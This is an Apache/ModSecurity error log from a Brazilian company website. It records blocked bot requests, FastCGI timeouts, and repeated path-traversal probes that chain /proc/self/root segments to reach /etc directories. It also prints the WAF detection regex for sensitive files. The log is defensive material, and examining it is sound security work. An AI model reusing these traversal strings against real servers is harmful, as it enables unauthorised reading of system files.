[Tue Mar 17 15:07:40.090101 2026] [proxy_fcgi:error] [pid 6296:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:33178] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:08:05.335305 2026] [proxy_fcgi:error] [pid 6296:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:33840] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:08:07.390491 2026] [:error] [pid 6296:tid 140411548894976] [client 74.7.243.128:52820] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmYh3Ik7brgkOH-rIWSDwAAAVc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:08:23.445840 2026] [:error] [pid 9299:tid 140411607643904] [client 74.7.244.43:46972] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmYl7-sgTmmJoPuMdy8uAAAAtA"]
[Tue Mar 17 15:08:28.126587 2026] [proxy_fcgi:error] [pid 9299:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:34560] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:08:31.363820 2026] [:error] [pid 6296:tid 140411574073088] [client 74.7.228.61:34838] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmYn3Ik7brgkOH-rIWSJwAAAVQ"]
[Tue Mar 17 15:08:51.133808 2026] [proxy_fcgi:error] [pid 2598:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:34970] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:09:13.121187 2026] [proxy_fcgi:error] [pid 19507:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:35696] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:09:18.368520 2026] [:error] [pid 6296:tid 140411658000128] [client 74.7.243.128:52820] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmYzHIk7brgkOH-rIWSSwAAAUo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:09:40.129788 2026] [proxy_fcgi:error] [pid 29151:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:36788] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:09:49.065924 2026] [:error] [pid 7004:tid 140411607643904] [client 74.7.241.31:40190] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmY7MU6Sx0TG1YjmQi1uwAAApA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 15:09:51.420698 2026] [:error] [pid 2473:tid 140411548894976] [client 74.7.241.31:48966] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmY76BJNF7axNlVR0Ue-AAAABc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 15:09:52.964609 2026] [:error] [pid 6296:tid 140411540502272] [client 74.7.241.31:48970] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmY8HIk7brgkOH-rIWSYAAAAVg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 15:09:55.053764 2026] [:error] [pid 18380:tid 140411582465792] [client 74.7.243.128:59964] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmY864xEDsg_V3ESNZSoQAAAhM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:09:55.808879 2026] [:error] [pid 7437:tid 140411674785536] [client 74.7.241.31:48972] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmY8weiSKl8TjouI-YgBgAAA8g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 15:10:01.167542 2026] [proxy_fcgi:error] [pid 2473:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:37570] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:10:14.252606 2026] [:error] [pid 9299:tid 140411565680384] [client 74.7.241.31:40186] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmZBr-sgTmmJoPuMdy9AgAAAtU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:10:24.128823 2026] [proxy_fcgi:error] [pid 2473:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:38570] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:10:29.655489 2026] [:error] [pid 2598:tid 140411641214720] [client 74.7.241.31:34528] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmZFRj0p0SRWAqcjGGAQwAAAww"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 15:10:30.355436 2026] [:error] [pid 7004:tid 140411565680384] [client 74.7.243.128:33308] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmZFsU6Sx0TG1YjmQi14QAAApU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:10:47.066937 2026] [proxy_fcgi:error] [pid 7004:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:39474] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:10:50.007503 2026] [:error] [pid 2598:tid 140411632822016] [client 74.7.241.31:34528] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmZKhj0p0SRWAqcjGGAUwAAAw0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 15:10:51.697272 2026] [:error] [pid 6296:tid 140411716749056] [client 74.7.241.31:34740] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmZK3Ik7brgkOH-rIWSfgAAAUM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 15:11:05.431093 2026] [access_compat:error] [pid 7004:tid 140411599251200] [client 70.54.45.205:54150] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Tue Mar 17 15:11:09.129859 2026] [proxy_fcgi:error] [pid 17965:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:40266] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:11:24.490055 2026] [:error] [pid 6296:tid 140411649607424] [client 74.7.241.31:34750] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmZTHIk7brgkOH-rIWSnAAAAUs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 15:11:29.509886 2026] [:error] [pid 7004:tid 140411641214720] [client 74.7.241.31:43898] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmZUcU6Sx0TG1YjmQi2BwAAAow"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 15:11:31.131559 2026] [proxy_fcgi:error] [pid 19507:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:41036] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:11:32.439231 2026] [:error] [pid 7437:tid 140411616036608] [client 74.7.241.31:43910] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmZVAeiSKl8TjouI-YgMgAAA88"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:11:37.075032 2026] [:error] [pid 9299:tid 140411540502272] [client 74.7.241.31:43924] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmZWb-sgTmmJoPuMdy9QAAAAtg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:11:53.144780 2026] [proxy_fcgi:error] [pid 17965:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:41904] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:12:12.834920 2026] [:error] [pid 7004:tid 140411658000128] [client 74.7.241.31:41764] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmZfMU6Sx0TG1YjmQi2LgAAAoo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 15:12:15.101808 2026] [proxy_fcgi:error] [pid 9299:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:42640] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:12:32.847324 2026] [:error] [pid 2598:tid 140411683178240] [client 74.7.241.31:40802] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmZkBj0p0SRWAqcjGGAiAAAAwc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 15:12:38.143145 2026] [proxy_fcgi:error] [pid 18380:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:43708] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:12:54.575405 2026] [:error] [pid 7437:tid 140411691570944] [client 74.7.241.31:42798] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmZpgeiSKl8TjouI-YgZgAAA8Y"], referer: 